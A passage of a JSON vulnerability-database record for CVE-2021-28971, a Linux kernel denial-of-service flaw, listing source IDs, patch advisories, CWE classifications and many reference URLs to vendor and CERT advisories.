        "db": "CNVD",
        "id": "CNVD-2021-24271",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-388497",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28971",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165296",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164967",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388497"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28971"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28971"
      }
    ]
  },
  "id": "VAR-202103-1243",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388497"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:11:24.674000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NTAP-20210430-0003",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
      },
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=145651"
      },
      {
        "title": "Red Hat: CVE-2021-28971",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2021-28971"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-28971 log"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-28971"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-755",
        "trust": 1.1
      },
      {
        "problemtype": "Resource exhaustion (CWE-400) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388497"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28971"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
      },
      {
        "trust": 1.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d88d05a9e0b6d9356e97129d4ff9942d765f46ea"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210430-0003/"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28971"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4vckioxcozgxbezmo5lggv5mwcho6ft3/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ptrnpqtz4gvs46sz4obxy5ydogvpstgq/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/t2s3i4slrnruqdofyus6iuazmqnmpnlg/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4vckioxcozgxbezmo5lggv5mwcho6ft3/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/t2s3i4slrnruqdofyus6iuazmqnmpnlg/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ptrnpqtz4gvs46sz4obxy5ydogvpstgq/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162939/ubuntu-security-notice-usn-4979-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164875/red-hat-security-advisory-2021-4140-02.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1919"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162981/ubuntu-security-notice-usn-4984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1964"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2217"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162549/ubuntu-security-notice-usn-4948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1655"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1946"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1307"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1625"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3825"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1231"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2136"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1299"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1694"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-denial-of-service-via-intel-pmu-drain-pebs-nhm-34913"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28964"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29647"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31916"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26143"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24504"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3600"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-20239"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26144"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3679"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-36158"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3635"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-31829"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26145"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-36386"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-33200"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-29650"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3573"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-29368"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-20194"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24586"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26147"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-31916"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26141"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3348"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-28950"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24588"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26140"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-31440"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26146"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-29646"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-29155"
      },
      {
        "trust": 0.4,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3732"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-0129"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3489"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-29660"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24587"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26139"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24502"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24503"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3659"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3564"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-0427"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-23133"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28688"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-27777"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29264"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28660"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28952"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26144"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24504"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20239"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20194"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0129"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26143"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26140"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36386"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36158"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26146"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35448"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20284"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35522"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35524"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-27645"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33574"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3487"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35521"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-35942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36312"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3778"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36331"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31535"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36330"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20266"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36332"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3481"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35523"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20197"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3796"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/400.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/198509"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1046.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-74.83~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1040.41"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1044.46~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1044.47~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4982-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1044.47"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1016.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1048.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-74.83"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1046.50~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1044.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1048.50~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1049.51~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1016.17~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1049.51"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1033.35"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28038"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4984-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-55.62"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1028.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1035.37"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1031.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1032.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-55.62~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3428"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1092.94"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4979-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1115.128"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1103.110"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1100.113"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1072.80"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-144.148"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1103.112"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4140"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3712"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:5137"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4356"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4948-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29650"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27"
      },
      {
        "trust": 0.1,
